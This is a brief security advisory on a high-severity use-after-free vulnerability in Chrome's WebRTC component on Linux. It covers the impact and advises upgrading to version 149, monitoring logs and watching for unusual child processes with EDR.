A high-severity Use-After-Free vulnerability in Google Chrome’s WebRTC implementation on Linux platforms exposes users to potential remote code execution.

This vulnerability involves a Use-After-Free error in the WebRTC stack, which can be triggered by an unauthenticated remote attacker. Successful exploitation requires the user to interact with malicious content that leverages the vulnerable WebRTC function.

With a CVSS score of 8.8, this flaw represents a significant risk to Linux-based endpoints. Unauthorized code execution could result in full system compromise, data exfiltration, or the installation of persistent threats on the affected workstation.

Immediate Action: Deploy the latest stable release of Google Chrome (version 149 or later) to all Linux environments.

Proactive Monitoring: Review system logs for signs of suspicious browser activity or memory-related crashes in WebRTC-heavy applications.

Compensating Controls: Use endpoint detection and response (EDR) tools to monitor for unauthorized child processes spawned by the Google Chrome browser.

Public Exploit Available: false

Organizations utilizing Google Chrome on Linux must treat this update as critical. Apply the vendor-provided patch to version 149 immediately to eliminate the risk of remote code execution via the WebRTC component.